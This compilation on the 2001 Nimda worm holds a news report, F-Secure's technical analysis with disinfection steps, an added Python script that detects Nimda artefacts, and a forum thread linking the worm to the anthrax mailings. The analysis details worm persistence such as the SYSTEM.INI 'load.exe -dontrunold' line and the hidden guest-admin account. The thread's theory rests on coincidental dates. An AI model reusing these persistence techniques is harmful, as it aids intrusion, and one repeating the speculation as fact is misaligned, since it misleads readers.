"Nimda" worm strikes Net, e-mail
Published: September 18, 2001, 5:20 PM PDT
update
A computer worm that spreads to both servers and PCs running Microsoft software flooded the Internet with data Tuesday, prompting
the FBI to create a task force to investigate the attack, sources said.
Known as "Nimda" or "readme.exe," the worm spreads by sending infected e-mail messages, copying itself
to computers on the same network, and compromising Web servers using Microsoft's Internet Information Server (IIS) software.
"It is extraordinary how much traffic this thing has created in a
couple of hours," said Graham Cluley, senior security consultant for antivirus company Sophos. "As far as we can see, it doesn't seem to be using any psychological tricks because it's all automated."
Mailing lists for the security community quickly generated news of the worm, as infected servers scanned
the Internet for vulnerable servers.
Sources in the antivirus community told CNET News.com that the FBI has set up a "task force" to study
the virus. The FBI held conference calls three times Tuesday night with antivirus experts to discuss the investigation, sources
said.
"There was a task force set up today, and there were a lot of things discussed," said Vincent Gullotto,
director of antivirus research at security software firm Network Associates.
"No evidence" of terrorist link
An FBI representative said the agency was "assessing" the
incident, but so far it found no relationship between the online deluge and last week's terrorist attacks on the World Trade
Center and the Pentagon.
"There has been no indication that this is linked (to Tuesday's) attack," said FBI spokeswoman Debbie
Weierman. "That is the question of the day."
At a news conference Tuesday about last week's terrorist attacks, Attorney General John Ashcroft also
spoke about the Internet worm. "This could be heavier than the July activity with Code Red," he said.
He noted that there is "no evidence" linking the worm, which he said may have first appeared on Monday,
"to the terrorist attacks of last week."
The worm was noticed by several Silicon Valley companies.
"It does appear to be more aggressive than Code Red," said spokeswoman Pamela Sklar of network equipment
maker 3Com. She added that the company's IT department received more hits per hour from Nimda than it did from Code Red, but
that there was no direct effect on e-mail or Internet access.
The worm's name sparked speculation about its origin. Nimda, for example, is the backward spelling
of admin, the common shorthand for the system administrator. While the worm has text indicating that it may have originated
in China, that is in no way hard evidence, experts said.
Others pointed out that NIMDA is the name of an Israeli defense contractor.
The worm apparently generates an avalanche of Internet traffic because of its multipronged attack on
both servers and PCs.
The server component of the virus exploits an old and previously patched flaw in IIS called the Unicode
Directory Traversal vulnerability.
Once a server is infected, the worm continues to scan for other vulnerable computers. In addition,
the program takes control of the part of Microsoft's IIS software that delivers Web pages, allowing the virus to trump a request for any page--even invalid requests--and instead return a page infected with the virus.
In addition to its ability to cross between servers and PCs, the Nimda worm seems to be more virulent
because it automatically executes in Microsoft's Outlook e-mail software under the program's "low" security setting.
"There appears to be a MIME exploit," said Eric Chien, chief researcher for antivirus software maker Symantec's European operations.
"It appears that it is doing some kind of exploitation in e-mail."
Nimda also appears to be capable of spreading by other means, including Internet relay chat (IRC), an online chat format, and by FTP for remotely exchanging files.
"My guess is we may also see it spread through Internet relay chat," said Alex Shipp, senior antivirus
technologist at e-mail screening firm MessageLabs.
And that may not be the end of it. "We have also found an FTP component in there," Shipp said. "It
may be trying to download nasty stuff from some Web site somewhere--we're still not sure. We know it is using FTP, but we
don't know how yet."
MessageLabs
said it stopped more than a hundred copies of the virus attached to e-mail messages within an hour of the first incident,
which arrived from Korea at 12:10 p.m. GMT.
Most of the Nimda copies captured by MessageLabs originated from the United States, leading the company
to speculate that was where the virus originated.
While thousands of people likely became aware of the worm when their in-boxes were flooded with e-mail,
for some the damage was more severe.
Mel Lower of Davenport, Iowa, who hosts Web sites for small businesses through EarthLink, said two
of his customers' sites were inaccessible for much of Tuesday.
Lower said he contacted EarthLink and was told that the worm "crippled" two Unix server farms. EarthLink
could not immediately be reached for comment.
When Nimda arrives in an e-mail, it appears as an attachment named readme.exe. This is the same name
used by another current virus called W32/Apost-A, so antivirus companies say many people should already be wary of attachments
bearing that name.
However, analysis of the worm is ongoing, experts said.
"First of all, we are talking guesses at this time," said Fred Cohen from the University of New Haven
in Connecticut. "Clearly, (it) just showed up this morning."
For some time Tuesday morning, the worm's double whammy had experts believing that two pieces of code
were spreading at the same time.
The Computer Emergency Response Team
Staff writer Matt Loney contributed from London.
F-Secure Virus Descriptions : Nimda
INFORMATION ON NIMDA
This worm was found on September 18th, 2001. It quickly spread around
the world.
Also see http://www.F-Secure.com/news/2001/news_2001091900.shtml
F-Secure Anti-Virus detects the worm with updates released on
September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.
http://www.europe.f-secure.com/download-purchase/updates.shtml
For removal instructions, see the bottom of the page.
GENERAL INFORMATION
Nimda is a complex virus with a mass mailing worm component which
spreads itself in attachments named README.EXE. It affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000
users.
Nimda is the first worm to modify existing web sites to start
offering infected files for download. Also it is the first worm to use normal end user machines to scan for vulnerable web
sites. This technique enables Nimda to easily reach intranet web sites located behind firewalls - something worms such as
Code Red couldn't directly do.
Nimda uses the Unicode exploit to infect IIS web servers. This
hole can be closed with a Microsoft patch, downloadable from: http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
The MIME exploit used by the worm can be fixed with this patch:
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
LIFECYCLE
The actual lifecycle of Nimda can be split into four parts: 1)
Infecting files, 2) Mass mailing, 3) Web worm and 4) LAN propagation.
1) File infection
Nimda locates EXE files from the local machine and infects them
by putting the file inside its body as a resource, thus 'assimilating' that file. These files then spread the infection when
people exchange programs such as games.
2) Mass mailer
Nimda locates e-mail addresses via MAPI from your e-mail client
as well as searching local HTML files for additional addresses. Then it sends one e-mail to each address. These mails contain
an attachment called README.EXE, which might be executed automatically on some systems.
3) Web worm
Nimda starts to scan the internet, trying to locate www servers.
Once a web server is found, the worm tries to infect it by using several known security holes. If this succeeds, the worm
will modify random web pages on the site. End result of this modification is that web surfers browsing the site will get automatically
infected by the worm.
4) LAN propagation
The worm will search for file shares in the local network, either
from file servers or from end user machines. Once found, it will drop a hidden file called RICHED20.DLL to any directory which
has DOC and EML files. When other users try to open DOC or EML files from these directories, Word, Wordpad or Outlook will
execute RICHED20.DLL causing an infection of the PC. The worm will also infect remote files if it was started on a server.
TECHNICAL DETAILS
First it should be noted that the worm behaves differently when
started from files with different file names and with different command lines.
Starting on a server:
If the name of worm's file is ADMIN.DLL, the worm creates a mutex
with 'fsdhqherwqi2001' name, copies itself as MMC.EXE into \Windows\ directory and starts this file with '-qusery9bnow' command
line. Usually the worm is started as ADMIN.DLL on infected webservers. In this case the worm starts to scan and infect files
on all available drives including removable and network ones. The EXE files (except WINZIP32.EXE) on these drives will get
infected with the worm. The infection technique the worm uses is new - the worm puts an infected file inside its body as a
resource. When the infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it
afterwards. If instant deletion is not possible, the worm creates WININIT.INI file that will delete the extracted file on
next Windows startup.
The worm also accesses the [SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths] key, reads the subkeys from there and
infects all files listed in the subkeys. The worm doesn't infect the WinZip32.exe file.
Also the worm reads user's personal folders from [Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] key and
infects files in these folders as well.
Then the worm starts to search local hard drives for *.HTML,
.ASP, and .HTM files and if such files are found, the worm creates README.EML file (which is the multi-partite message with
MIME-encoded worm) in the same directory and adds a small JavaScript code to the end of found files. That JavaScript code
would open README.EML file when the infected HTML file is loaded by a web browser. As a result the MIME-encoded worm will
get activated because of a security hole and a system will get infected.
The worm's file runs from a minimized window when downloaded
from an infected webserver. This technique affects users who are browsing the web with Internet Explorer 5.0 or 5.01.
The worm will also put *.EML and *.NWS files in almost all folders
of computers it accesses. The RICHED20.DLL file with hidden and system attribute will be put in all folders where DOC or EML
files are located. The worm will also try to replace Windows' original RICHED20.DLL file with its own copy.
Starting on a workstation:
If the worm is started from README.EXE file (or a file that has
more than 5 symbols in its name and EXE extension), it copies itself to temporary folder with a random name that has 'MEP*.TMP'
name and runs itself there with '-dontrunold' command line option.
When started, the worm loads itself as a DLL library, looks for
a specific resource there and checks its size. If the resource size is less than 100, the worm unloads itself, otherwise it
extracts its resource to a file and launches it. Checking the resource size is done to be able to detect if a worm runs from
infected EXE files.
Then the worm gets current time and generates a random number.
After performing a few arithmetic operations with this number the worm checks the result. If a result is bigger than worm's
counter, the worm starts to search and delete README*.EXE files from temporary folder.
After that the worm prepares its MIME-encoded copy by extracting
a pre-defined multi-partite MIME message from its body and appending its MIME-encoded copy to it. The file with a random name
is created in a temporary folder.
The worm then looks for EXPLORER process, opens it and assigns
its process as a remote thread of Explorer. On some platforms the worm fails to run as Explorer's thread. The worm gets API,
creates a mutex with the 'fsdhqherwqi2001' name, starts up Winsock services, gets infected computer (host) info and sleeps for
some time. When resumed, the worm checks what platform it is running on. If it is running on an NT-based system, it compacts its
memory blocks to occupy less space in memory and copies itself as LOAD.EXE to Windows system directory. Then it modifies SYSTEM.INI
file by adding the following string after SHELL= variable in [Boot] section:
explorer.exe load.exe -dontrunold
This will start the worm's copy every time Windows starts. The
worm also copies itself as RICHED20.DLL file to system folder and sets hidden and system attributes to this file as well as
to LOAD.EXE file. Then the worm enumerates shared network resources and starts to recursively scan files on remote systems.
When searching for files on remote systems the worm looks for
.DOC and .EML files and then copies its binary image with RICHED20.DLL name to the folders where DOC and EML files are located.
The copied DLL file has system and hidden attributes. This is done to increase the chances of worm activation on remote systems
as Windows' original RICHED20.DLL component is used to open OLE files. But instead the worm's RICHED20.DLL file from current
directory will be launched.
Also, when the worm browses the remote computers' directories,
it creates .EML and .NWS (rarely) files that have the names of document or webpage files that the worm could find on a remote
system. These .EML and .NWS files are worm's multi-partite messages with a worm MIME-encoded in them. When scanning the worm
can also delete the .EML and .NWS files it previously created.
The worm doesn't try to infect local or remote EXE files when
started from a workstation.
E-Mail spreading:
The worm searches through all the '.htm' and '.html' files in the
Temporary Internet Files folder for e-mail addresses. It reads through the user's inbox and collects the sender addresses. When
the address list is ready it uses its own SMTP engine to send the infected messages.
IIS spreading:
The worm uses backdoors on IIS servers such as the one CodeRed
II installs. It scans random IP addresses for these backdoors. When a host is found to have one, the worm instructs the machine
to download the worm code (Admin.dll) from the host used for scanning. After this it executes the worm on the target machine
this way infecting it.
Affecting the security:
The worm adjusts the properties of Windows Explorer, it accesses
[Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] key and adjusts 'Hidden', 'ShowSuperHidden' and 'HideFileExt'
keys. This affects Windows' (especially ME and 2000) ability to show hidden files - worm's files will not be seen in Explorer
any more.
After that the worm adds a 'guest' account to infected system
account list, activates this account, adds it to the 'Administrator' and 'Guests' groups and shares the C:\ drive with full access
privileges. The worm also deletes all subkeys from the [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security] key to
disable sharing security.
Additional information:
The worm has a copyright text string that is never displayed:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
It should be said that the worm has bugs that cause crashes or
inability to spread itself in certain conditions.
DISINFECTION INSTRUCTIONS
F-Secure Anti-Virus with the latest updates can detect and disinfect
Nimda infections. But full disinfection of the worm will require some additional manual actions.
The F-NIMDA tool was developed to automate these actions. If
you wish to do them by hand, follow the instructions below. Otherwise, download F-NIMDA from
ftp://ftp.f-secure.com/anti-virus/tools/fsnimda3.exe
If you're running Windows ME, you need to turn off the Autorestore
functionality before starting any disinfection. Do this by clicking My Computer on desktop, then Performance->File System
->Troubleshooting->Disable System Restore. Turn it back on when done.
To disinfect the worm and restore security of affected workstations,
please follow these instructions:
1. Disable all network sharing or temporarily kill the network.
This is a _must_ as the worm uses the network to spread itself.
2. Scan _all_ files (not just files with selected extensions)
on all local hard drives and clean all infected EXE files using F-Secure Anti-Virus and the latest updates. It is recommended
that you use one of the latest FSAV versions to remove infection.
3. Delete or rename (if not possible to delete instantly) all
non-disinfectable or locked files including worm droppers (typically 57kB in size):
MMC.EXE (in Windows directory)
LOAD.EXE (in Windows' system directory)
ADMIN.DLL (in root folder of all local hard drives)
RICHED20.DLL (in all folders on all local hard drives)
All *.EML and *.NWS files (typically 79kB in size) that are
detected as infected with Nimda should be deleted. Note that
you might have clean EML files as well, for example if you've
saved e-mails to file from Outlook Express, so only delete
files that FSAV detects as infected.
If an infected file is locked by Windows, complete disinfection,
exit to pure DOS or boot your system with a clean system diskette and rename/delete the file manually. In case of NT/2000
based system the locked file(s) should be renamed with a non-executable extension to ensure that it doesn't start when Windows
is booted next time.
4. Restart a system. Do not connect it to the network yet. It
is advised to scan all files on all local drives with FSAV again to ensure that there are no more infected files in a system.
5. Locate SYSTEM.INI file in your Windows directory and open
it with Wordpad or Notepad. Replace the string "shell=explorer.exe load.exe -donotloadold" with "shell=explorer.exe" string.
6. Delete all files with .TMP extensions from your local temporary
directories - typically \Temp\ or \Windows\Temp\ or \documents and settings\username\local settings\temp.
7. Copy a clean RICHED20.DLL file to \Windows\System\ or \WinNT\System32\
folders. This DLL file is used by many applications and they won't run if this DLL is missing. You can locate a clean RICHED20.DLL
file from a clean Windows machine, or extract it from Office 2000 CD with this command: EXTRACT /A r:\office1.cab riched20.dll /L c:\windows\system
8. Remove all shares from all local hard drives and renew these
shares with correct access rights if needed. This needs to be done because the worm affects shares security. Check especially
the \\localhost\c$ share rights.
9. Remove 'Guest' account and renew it with correct access rights
and group placement ('Guest' account should not be in 'Administrators' group).
10. Check all *.HTML, *.ASP, and *.HTM as well as files that
have 'DEFAULT', 'INDEX', 'MAIN' and 'README' words in their filenames for the small JavaScript code referring to README.EML
file and remove it or restore the affected files from a backup. This JavaScript code is located in the very end of affected
files.
11. When cleaning a webserver from Nimda, the CodeRed II backdoor
infections should be removed as well. Please refer to 'CodeRed' description and cleaning instructions.
http://www.europe.f-secure.com/v-descs/bady.shtml
12. Correct Windows Explorer's settings concerning displaying
of hidden files and certain extensions if necessary as the worm makes Explorer to hide certain files and extensions.
13. Restore network connections only after all workstations are
disinfected, or the worm will re-infect already clean computers!
ABOUT INFECTED WEB SITES
A web site can get infected in two ways:
1) Infected HTML files are copied to the secure site. This can happen
even if you're using a patched version of IIS or something else entirely (such as Apache or Netscape). If there are infected
computers in your organization, their local html files get infected. Users might then later copy or upload such infected pages
to your www server. Alternatively, if your www files are accessible via file sharing the worm might infect them directly from
a workstation. To clean your site, locate all html pages which refer to "README.EML" and remove the extra Javascript code
from the end of the pages.
2) Direct web worm infection. If your web site is running an
unsafe version of IIS, the worm can infect your site by accessing it through http. After this it will restart spreading from
your server. In this case, it is not enough to just clean the virus - your web server is unsafe and has been so for a while.
It's likely there have been previous illegitimate accesses to your site as well and it should be considered compromised. We
recommend rebuilding the web server and applying latest patches before restoring clean copies of the html pages.
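Disinfection steps 5 and 10 above and case 1 of this section all reduce to file-system checks that a responder would want to run over a copied or mounted drive before trusting a machine again. The following Python triage script is an added example, not F-Secure's F-NIMDA tool; it builds a constructed sample tree (build_sample_tree) whose files are harmless stand-ins, and the "appended JavaScript" is represented by a placeholder that merely names readme.eml.

```python
import os
import tempfile
from pathlib import Path

WEB_EXTS = {".htm", ".html", ".asp"}   # file types step 10 says to inspect
DOC_EXTS = {".doc", ".eml"}            # folders holding these receive a RICHED20.DLL dropper
TAIL_BYTES = 4096                      # the appended script sits at the very end of a page

def html_refers_to_readme_eml(path):
    """Step 10: flag a page whose tail carries a <script> block that names README.EML."""
    with open(path, "rb") as f:
        f.seek(0, os.SEEK_END)
        f.seek(max(0, f.tell() - TAIL_BYTES))
        tail = f.read().lower()
    return b"<script" in tail and b"readme.eml" in tail

def riched20_beside_documents(folder):
    """LAN propagation: RICHED20.DLL dropped into a folder that also holds DOC or EML files."""
    names = [n.lower() for n in os.listdir(folder)]
    return "riched20.dll" in names and any(Path(n).suffix in DOC_EXTS for n in names)

def _boot_shell_tokens(line, section):
    """Tokens of a [boot] shell= line, or None for any other line."""
    if section != "boot" or not line.lower().startswith("shell="):
        return None
    return line.split("=", 1)[1].lower().split()

def shell_line_tampered(system_ini):
    """Step 5: shell= in [boot] must be exactly explorer.exe; the worm appends load.exe."""
    section = None
    with open(system_ini, encoding="utf-8", errors="replace") as f:
        for raw in f:
            line = raw.strip()
            if line.startswith("[") and line.endswith("]"):
                section = line[1:-1].lower()
            tokens = _boot_shell_tokens(line, section)
            if tokens is not None:
                return tokens != ["explorer.exe"]
    return False

def restore_shell_line(system_ini):
    """Step 5 remediation: rewrite a tampered shell= line to explorer.exe; True if changed."""
    out, section, changed = [], None, False
    with open(system_ini, encoding="utf-8", errors="replace") as f:
        for raw in f:
            line = raw.strip()
            if line.startswith("[") and line.endswith("]"):
                section = line[1:-1].lower()
            tokens = _boot_shell_tokens(line, section)
            if tokens is not None and tokens != ["explorer.exe"]:
                raw, changed = "shell=explorer.exe\n", True
            out.append(raw)
    if changed:
        with open(system_ini, "w", encoding="utf-8") as f:
            f.writelines(out)
    return changed

def triage(root):
    """Walk a copied or mounted tree; return sorted (finding, relative path) pairs."""
    root, findings = Path(root), []
    for dirpath, _dirs, files in os.walk(root):
        folder = Path(dirpath)
        if riched20_beside_documents(folder):
            findings.append(("riched20_dropper", (folder / "RICHED20.DLL").relative_to(root).as_posix()))
        for name in files:
            p = folder / name
            rel = p.relative_to(root).as_posix()
            if p.suffix.lower() in WEB_EXTS and html_refers_to_readme_eml(p):
                findings.append(("readme_eml_script", rel))
            elif name.lower() == "system.ini" and shell_line_tampered(p):
                findings.append(("shell_line", rel))
    return sorted(findings)

def build_sample_tree(base):
    """Constructed sample tree (stand-ins, not real worm artefacts) exercising each check."""
    base = Path(base)
    (base / "site").mkdir()
    (base / "site" / "about.html").write_text("<html><body>clean page</body></html>\n")
    (base / "site" / "index.html").write_text("<html><body>home</body></html>\n"
        '<script language="JavaScript">/* constructed stand-in that only names readme.eml */</script>\n')
    (base / "docs").mkdir()
    (base / "docs" / "report.doc").write_bytes(b"constructed document")
    (base / "docs" / "RICHED20.DLL").write_bytes(b"constructed dropper stand-in")
    (base / "mail").mkdir()   # a lone saved .eml with no DLL beside it must NOT be flagged
    (base / "mail" / "saved.eml").write_text("Subject: kept mail\n\nno dropper in this folder\n")
    (base / "Windows").mkdir()
    (base / "Windows" / "SYSTEM.INI").write_text(
        "[boot]\nshell=explorer.exe load.exe -dontrunold\n[386Enh]\ndevice=*vmm\n")
    return base

def run_sample():
    """Build the sample tree in a temp dir, triage it, restore SYSTEM.INI, triage again."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = build_sample_tree(tmp)
        before = triage(tree)
        restored = restore_shell_line(tree / "Windows" / "SYSTEM.INI")
        after = triage(tree)
    return {"before": before, "restored": restored, "after": after}
```

Only the SYSTEM.INI finding is auto-repaired; the flagged pages and the dropped DLL are reported so they can be restored from backup or deleted per steps 3 and 10.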
Remember, F-Secure Management Server 4.x uses IIS as a web server
platform. Keep them patched. F-Secure Policy Manager Server 5.0 and higher do NOT use IIS.
IMPORTANT NOTE
Around 15:00 GMT on 11th of October, 2001, hundreds of e-mails
infected with Nimda.A were sent to various addresses around the world. These e-mails looked like they were sent by "mikko.hypponen@datafellows.com"
(do note that F-Secure used to be called datafellows.com; company name and domain was changed in early 2000). Mr. Mikko Hypponen
is our Manager of Anti-Virus Research. He naturally had nothing to do with this incident. These e-mails were apparently sent
from an infected machine located somewhere in Canada.
F-SECURE ANTI-VIRUS
F-Secure Anti-Virus detects the worm with updates released on
September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.
http://www.europe.f-secure.com/download-purchase/updates.shtml
[Analysis: K. Tocheva, G. Erdelyi, A. Podrezov, S. Rautiainen and M.
Hypponen; F-Secure Corp.; September 18-19th, 2001]
Possible break in the anthrax case? (Actual title: Anthrax-Nimda Connection)
Dept. of Computer Science and Software Engineering, Seattle University | November 9, 2001 | M. Spector
Posted on 11/13/2001 12:42:52 PM PST by Mitchell
ANTHRAX-NIMDA CONNECTION
Two Prongs of One Attack on Our Communication System
M. Spector, Dept. of Computer Science and Software Engineering, Seattle University
E-mail: spector@seattleu.edu
November 9, 2001
It appears likely that the recent anthrax mailings and the Nimda computer
worm are two prongs of a single coordinated attack on our communications infrastructure. If this theory is correct, there
may be two undiscovered anthrax-laden letters, including one mailed in late October whose victims would still be in the incubation
period.
A Summary of the Evidence
The anthrax mailings and the Nimda worm were released on exactly the same two
dates. Moreover, they were distributed via essentially the same method, and they shared a common apparent purpose.
The details follow.
Released on the Same Dates
The anthrax-laden letters were postmarked on Sept. 18 and Oct. 9, 2001. These are
precisely the same dates that the destructive Nimda worm and a new variant of this worm called Nimda.B were released on the
Internet. Sept. 18 was the date that the Nimda worm was released on the Internet, and Oct. 9 was the date that the Nimda.B
variant was released.
Same Method
Both involve mailing (either by the Postal Service or by e-mail) a destructive payload to unsuspecting
individuals. Although the two attacks (anthrax and Nimda) appear at first glance to be very different from one another, a
similar mind-set seems to underlie both.
Same Apparent Purpose
Both attacks may have had as their combined purpose the simultaneous disruption of all
our mail communications -- both the U.S. mail and e-mail. Luckily, neither attack has been particularly successful in this
regard, at least so far.
In addition, the anthrax letters were sent to people in the mass media, which is another
component of our communications system.
Consequences
Still-Undiscovered Anthrax Mailings? (Kathy Nguyen's Death and Another Possible Forthcoming Attack)
Three more
variants of the Nimda worm were released after Nimda.B: Nimda.C (on October 12), and Nimda.D and Nimda.E (both on October
29). If the anthrax-Nimda connection isn't a coincidence, there may have been further mailings of anthrax on October 12 and
October 29.
Are there undiscovered anthrax letters that were mailed on the later worm release dates of October 12
and October 29? Is it conceivable that a hypothetical October 12 mailing was responsible for Kathy Nguyen's death? I think
anybody infected by a hypothetical October 29 mailing would still be in the incubation period for the disease, with signs
of infection to show up shortly.
I hope I'm wrong about the possibility of an Oct. 29 anthrax mailing, but it's important
to be alert for more anthrax cases as we near the end of what would be the incubation period (and this is also a test of whether
the theory is correct).
Notice that these hypothetical anthrax release dates are consistent with the warnings of terrorist
attacks within the following few days issued by the FBI on Oct. 11 and by Attorney General John Ashcroft on Oct. 31 (especially
in light of both the incubation period for anthrax and the inherent uncertainty in warnings such as these).
Connection with Code Red II and earlier worms
The Nimda worm makes use of "back-doors" left by the earlier Code
Red II and sadmind worms. It is unknown if this is an opportunistic use of these back-doors, or if one or both of these earlier
worms were released with the specific intent of following up with the Nimda worm. It is also unknown if Code Red II is actually
related to the original Code Red worm (in spite of the names assigned by security experts). In any event, the sadmind worm
was released on May 8, 2001, Code Red was released on July 16, 2001, and Code Red II was released on August 4, 2001. It would
be of interest to see if there were any apparently unrelated anthrax threats, terrorist threats, etc., on May 8, July 16,
and/or August 4. (I have seen a news report indicating that Bill O'Reilly and Sean Hannity of Fox News may have received letters
before Sept. 11 apparently similar to the later anthrax mailings.)
The People Behind the Attack
The coincidence of dates and the similarity of methods and purpose indicate that
the same group of people is behind both the anthrax attacks and the Nimda series of worms. It appears that at least two people
must be involved, since one person is unlikely to be so skilled at both microbiology and software development as to have been
able to create and carry out both attacks.
Speculation
Speculation - Connections with the 9/11 attacks
The first Nimda attack occurred almost precisely one week (to
the hour, and maybe to the minute) after the first plane hit the World Trade Center, strongly suggesting a connection between
the Sept. 11 attacks and Nimda, and now therefore suggesting a connection between the Sept. 11 attacks and the anthrax mailings.
Speculation - Place of Origin
This theory may point to a foreign connection with the anthrax attack. It has been
widely suggested that Nimda may have originated in China; this is purely speculative and is based only on early widespread
propagation in Asia and on the fact the worm itself contains a reference to China.
Background: Technical Information on the Nimda Worm (and others)
For technical information on the Nimda, Code
Red, Code Red II, and sadmind worms, see the Symantec security web site at http://securityresponse.symantec.com , the F-Secure web site at http://www.europe.f-secure.com/v-descs/w.shtml (click on W32/Nimda.a@mm, etc.), and the SANS Institute web site at http://www.incidents.org .
1 posted on 11/13/2001 12:42:52 PM PST by Mitchell
To: Mitchell
I only skimmed, but this is pretty fascinating. I'll be interested to see other comments.
2 posted on 11/13/2001 12:48:37 PM PST by NYS_Eric
To: Mitchell; *tech_index; *Anthrax_Scare_List
Very interesting !
To find all articles tagged or indexed using above index words
Go here:
OFFICIAL BUMP(TOPIC)LIST
and then click the topic to initiate the search! !
To: Mitchell; *tech_index
Filing at tech_index
To: Mitchell
Bumpin' to check later.
Initial impression - it seems rather far-fetched, but, then again, that's an impressive set of 'coincidences'.
5 posted on 11/13/2001 12:57:55 PM PST by Le-Roy
To: Mitchell
Now THIS is getting really far fetched ....
Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...
6 posted on 11/13/2001 1:00:37 PM PST by AgThorn
To: Mitchell
Speculation - Connections with the 9/11 attacks.
Ahhh.... He admits this is speculation.
To: AgThorn
>Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...
"Evidence?"
If the sequence of events as speculated about turns out to be true, what kind of evidence would be available?!
Would you dismiss a connection as unreal until an FBI agent just happens to walk into a two bedroom apartment
where, in one bedroom, a guy is mixing up anthrax and in the other a guy is typing up computer code?
I mean, this is 2001. People doing this kind of terrorism aren't idiots. This weird, constant talk of "evidence" has an
air of insanity to it.
More likely than not, there will NEVER be evidence that will stand up in a court of law EXPLAINING everything nice and
tidy. But so what? Law enforcement or intelligent agencies still have to respond sooner rather than later to this kind of
large scale threats. They have to act on something other than "court room evidence." And if we're going to understand what's
going on around us, we have to recognize that although "evidence" is great and although it's dangerous to speculate
without hard, material evidence, there are many situations where people just have to get creative, people have to trust
their judgement, and people have to deal with conclusions based on them being persuasively true rather than true beyond
a shadow of a doubt.
Reality is not a court room. It's just not. There is a kind of insanity in trying to deny all of reality that doesn't meet
those utterly artificial standards.
Mark W.
8 posted on 11/13/2001 1:46:38 PM PST by MarkWar
To: MarkWar
What is the connection? the same date? that's it? That's pretty weak.
9 posted on 11/13/2001 1:54:37 PM PST by AgThorn
To: AgThorn
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at
this stage? It merits further investigation.
By the way, the CDC now thinks there is an undiscovered letter, mailed before Oct. 24. This could be the hypothesized Oct. 12 letter in the article. http://www.freerepublic.com/focus/fr/570240/posts
10 posted on 11/13/2001 2:01:19 PM PST by Mitchell
To: AgThorn
Sorry, but the "evidence" is not only weak, it is outright MISSING
This guy is so far out of his tree that it's pitiful. You see this phenomenon every time something happens on the malware
front: a zillion wannabes popping up with one theory more bizarre than the next. Simply put, he's wrong. And if he had bothered
to contact any of the people who knows about this stuff, he would know that he was wrong. That would probably not have deterred
him from trying for some spotlight, though.
The author of Nimda is out there giving interviews and shouting for fame. Much like this dweeb.
11 posted on 11/13/2001 2:07:32 PM PST by Cachelot
To: Mitchell; AgThorn
Sorry for the extra URL at the end (a copy-and-paste error). It's the same as the CDC link at the beginning
of that paragraph.
12 posted on 11/13/2001 2:11:11 PM PST by Mitchell
To: Cachelot
The author of Nimda is out there giving interviews and shouting for fame.
Interviews? Can you give a source for this? I've seen nothing on it.
13 posted on 11/13/2001 2:12:58 PM PST by Mitchell
To: Mitchell
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage? It merits further investigation.
Similarity of method, i.e. meaning they are both "mail" (snail and "e") ... Yes, and ???? Does that mean that anyone that ever drove a truck has something in common with anyone else that drove a truck? Especially if they did it on the same day? ... These "connections" are weaker than weak!!
Purpose?-That's redundant to "method" ... i.e. if your purpose is to get information channels blocked, you would
in effect use the information channel to do the blocking. No, this is a great model for conspiracy chasers only.
Date- I have already stated that the ONLY thing going here is the similarity of dates ... but what is that? nothing.
SANTA and SATAN have the same letters, just rearranged ... heck that's got as much "conspiracy" grounding in it as this
does.
14 posted on 11/13/2001 3:17:46 PM PST by AgThorn
To: AgThorn
SANTA and SATAN have the same letters, just rearranged...
This explains some of the Christmas presents I've gotten lately....
To: self_evident
I can relate!! ;-)
16 posted on 11/13/2001 5:29:22 PM PST by AgThorn
To: AgThorn
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.
Who would have thought that there were Japanese spying all over numerous countries in the late 30's and early 40's, collaborating
with Nazi's to boot --including a certain chap who lived for awhile in Pearl Harbor and liked to watch the ships move in and
out of port?
17 posted on 11/13/2001 10:35:38 PM PST by unspun
To: unspun
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.
You got a point there. Santa could after all be Satan, and remember, you read it here first!
18 posted on 11/13/2001 10:39:05 PM PST by AgThorn
To: AgThorn
Well, I'm not interested in getting into an argument over this. I find the coincidences intriguing, you don't;
that's OK.
Unlike the run-of-the-mill conspiracy theory, this one has testable conclusions; it's falsifiable. If it's correct, there ought to have been anthrax mailings postmarked very close to Oct. 12 and Oct. 29. (Even if such mailings turn up, I would agree that that's not definitive proof. If no such mailings turn up, however, that would be a strong argument against the theory.)
By the way, the similarity of method is much more than the fact that both used mail. Both involve using mail to send unrelated
destructive payloads to unsuspecting people. (This may still not be enough to satisfy your standards for a connection, but
it is more of a connection than your characterization suggests.)
Also, the similarity of purpose isn't the same as that of method. People have suggested lots of other possible rationales
behind the anthrax attack (a warning from Iraq, for instance, or bin Laden aiming at the media to elicit maximum hysteria
as he tries to goad us into an attack on all of the Muslim world, or possibly a test of how a biological agent would spread
in the mail, or other possibilities). If this connection is true, it suggests a particular specific purpose, namely trying
to disrupt or even shut down our mail and other communication systems.
Anyway, since the theory has testable conclusions, I thought it would be of interest to get it out there now, rather than
after any further mailings are discovered (since at that time, people might say that the theory was tailored to fit the facts).
Time will tell if it is true or false.
19 posted on 11/16/2001 1:06:33 PM PST by Mitchell
To: Mitchell
Time will tell if it is true or false.
I concede that for certain. I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection. Then again, who's to say that Nimda doesn't have Middle East ties as well.
There is just too little even circumstantial evidence to make any other correlation at this time. Although we can always
speculate ...
20 posted on 11/16/2001 1:07:08 PM PST by AgThorn
Comment #21 Removed by Moderator
To: AgThorn
I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection.
Then again, who's to say that Nimda doesn't have Middle-east ties as well.
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and
probably Iraq.
22 posted on 11/16/2001 1:07:24 PM PST by Mitchell
To: bologna.com
You knew Eceshe in high school as well?
And she told ME I was the only one!!!
